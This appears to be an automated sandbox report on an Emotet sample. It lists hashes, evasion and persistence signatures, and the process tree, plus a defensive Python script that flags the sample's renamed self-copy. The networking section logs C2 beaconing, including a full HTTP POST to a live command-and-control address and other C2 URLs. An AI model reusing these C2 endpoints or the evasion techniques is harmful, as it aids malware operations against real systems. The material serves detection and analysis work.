Analysis Report 23cf697d5faf11a3ffdd271e1d301173

Overview

General Information

Sample Name: 23cf697d5faf11a3ffdd271e1d301173 (renamed file extension from none to exe)
Analysis ID: 318806
MD5: 3af8293a860045454a04904b46d80a28
SHA1: fe56d6a87a4b99e2c32d0ba772a37d8df8462d93
SHA256: eb02570af6496a540ae809d7f06259e5eefe03ede0cdf48d25425013ded368d6

Detection

Emotet
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 23cf697d5faf11a3ffdd271e1d301173.exe (PID: 2120 cmdline: 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe' MD5: 3AF8293A860045454A04904B46D80A28)
    • dot3hc.exe (PID: 5976 cmdline: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe MD5: 3AF8293A860045454A04904B46D80A28)
  • svchost.exe (PID: 2992 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2152 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3892 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5776 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6628 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6676 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6740 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6784 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6872 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6904 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4092 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
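The process tree above shows the sample (PID 2120, started from the user's Desktop) launching dot3hc.exe (PID 5976) from C:\Windows\SysWOW64\cleanmgr\ with the same MD5 as the sample itself, which is what the "Drops executables to the windows directory (C:\Windows) and starts them" signature records. The check below, an added example rather than Joe Sandbox code, flags that pattern mechanically from a process list: a child whose binary hash equals its parent's but whose file name differs and whose path sits under the Windows directory. The tree is transcribed from the Startup section; the WINDOWS_ROOTS prefix list and the renaming heuristic are assumptions.

```python
"""
Flag a dropped self-copy in a sandbox process tree: a child process whose
executable hash equals its parent's, but which runs under a different file
name inside the Windows directory. Added example for this report, not Joe
Sandbox code; WINDOWS_ROOTS and the "renamed" heuristic are assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: anything below this prefix counts as "the Windows directory".
WINDOWS_ROOTS = ("c:\\windows\\",)


@dataclass(frozen=True)
class Proc:
    pid: int
    parent_pid: Optional[int]   # None for a root of the tree
    cmdline: str
    md5: str


def image_path(cmdline: str) -> str:
    """Executable path from a command line; the report quotes paths with ' or "."""
    cmdline = cmdline.strip()
    if cmdline and cmdline[0] in "'\"":
        quote = cmdline[0]
        return cmdline[1:cmdline.index(quote, 1)]
    return cmdline.split(" ", 1)[0]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_self_copies(procs: List[Proc]) -> List[Tuple[Proc, Proc]]:
    """(child, parent) pairs where the child is a renamed copy of the parent
    binary dropped under the Windows directory."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for child in procs:
        parent = by_pid.get(child.parent_pid) if child.parent_pid is not None else None
        if parent is None:
            continue
        child_img, parent_img = image_path(child.cmdline), image_path(parent.cmdline)
        same_binary = child.md5.lower() == parent.md5.lower()
        dropped_in_windows = child_img.lower().startswith(WINDOWS_ROOTS)
        renamed = basename(child_img) != basename(parent_img)
        if same_binary and dropped_in_windows and renamed:
            hits.append((child, parent))
    return hits


# Transcribed from the report's Startup section (PID, parent PID, cmdline, MD5).
REPORT_TREE = [
    Proc(2120, None, "'C:\\Users\\user\\Desktop\\23cf697d5faf11a3ffdd271e1d301173.exe'",
         "3AF8293A860045454A04904B46D80A28"),
    Proc(5976, 2120, "C:\\Windows\\SysWOW64\\cleanmgr\\dot3hc.exe",
         "3AF8293A860045454A04904B46D80A28"),
    Proc(6904, None, "c:\\windows\\system32\\svchost.exe -k localservicenetworkrestricted -p -s wscsvc",
         "32569E403279B3FD2EDB7EBD036273FA"),
    Proc(4092, 6904, "'C:\\Program Files\\Windows Defender\\mpcmdrun.exe' -wdenable",
         "A267555174BFA53844371226F482B86B"),
    Proc(4660, 4092, "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
         "EA777DEEA782E8B4D7C7C33BBF8A4496"),
]


def report_self_copies(procs: List[Proc] = REPORT_TREE) -> List[str]:
    """One human-readable line per hit."""
    return [
        f"PID {c.pid} {image_path(c.cmdline)} is a renamed copy of PID {p.pid} "
        f"{image_path(p.cmdline)} (MD5 {c.md5.lower()})"
        for c, p in find_self_copies(procs)
    ]


if __name__ == "__main__":
    for line in report_self_copies():
        print(line)
```

On a real host the same three facts come from Sysmon event ID 1 (ParentProcessId, Image, Hashes); the MD5 match is the strong signal here, since legitimate installers rarely copy themselves byte-for-byte into a new directory under SysWOW64 and run the copy.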

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(1 further entry not shown in this export)

            Unpacked PEs

Source | Rule | Description | Author
0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
3.2.dot3hc.exe.2170000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02172330 CryptGetHashParam,CryptExportKey,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptEncrypt,memcpy,GetProcessHeap,HeapFree
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02172010 memcpy,CryptDestroyHash,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDecrypt,CryptVerifySignatureW,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02633A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02173A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.3:49709 -> 152.32.75.74:443
Source: Traffic | Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.3:49715 -> 91.121.200.35:8080
Source: global traffic | TCP traffic: 192.168.2.3:49715 -> 91.121.200.35:8080
Source: Joe Sandbox View | IP Address: 152.32.75.74
Source: Joe Sandbox View | IP Address: 91.121.200.35
Source: Joe Sandbox View | ASN Name: CONVERGE-ASConvergeICTSolutionsIncPH
Source: Joe Sandbox View | ASN Name: OVHFR
Source: global traffic | TCP traffic: 192.168.2.3:49709 -> 152.32.75.74:443
Source: global traffic | HTTP traffic detected:
  POST /b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 91.121.200.35/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------D8UJrrwPxA
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 91.121.200.35:8080
  Content-Length: 4580
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 152.32.75.74 (3 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 91.121.200.35 (11 entries)
Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02172A80 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW
Source: unknown | HTTP traffic detected: POST /b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/ HTTP/1.1 (same headers as the global traffic entry above: Host 91.121.200.35:8080, multipart/form-data, Content-Length 4580, MSIE 7.0 User-Agent)
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/
Source: dot3hc.exe, 00000003.00000002.484904618.00000000022D4000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/#
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/2n
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ILE
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ata
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://152.32.75.74:443/e62xOOZ1/579L/jIWCf/ste
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/
Source: dot3hc.exe, 00000003.00000002.484989127.00000000022DD000.00000004.00000001.sdmp | String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/-
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/5
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/D
Source: dot3hc.exe, 00000003.00000002.485120144.00000000022F1000.00000004.00000001.sdmp | String found in binary or memory: http://91.121.200.35:8080/b077Ye/stpEDZ6RpK8mZBC0Wc/DVjA3U6/s
Source: svchost.exe, 00000007.00000002.488170801.0000027E35600000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.488170801.0000027E35600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.488170801.0000027E35600000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.487810077.0000027E35490000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000C.00000002.308182111.000001A004213000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.482425733.000002200523E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.308238435.000001A00424E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.307787026.000001A004263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308182111.000001A004213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.308238435.000001A00424E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 0000000C.00000003.307787026.000001A004263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.308182111.000001A004213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000C.00000002.308238435.000001A00424E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                Yara detected Emotet
                Source: Yara match | File source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | File created: C:\Windows\SysWOW64\cleanmgr\
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | File deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_004098D7
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_00408974
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02638180
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02631C70
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02637590
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212380E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02129D1E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_0212912E
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_004098D7
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_00408974
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02178180
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02171C70
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02177590
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: String function: 00408928 appears 53 times
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: String function: 00408928 appears 53 times
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                Source: classification engine | Classification label: mal68.troj.evad.winEXE@19/13@0/3
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe | Code function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe | Code function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
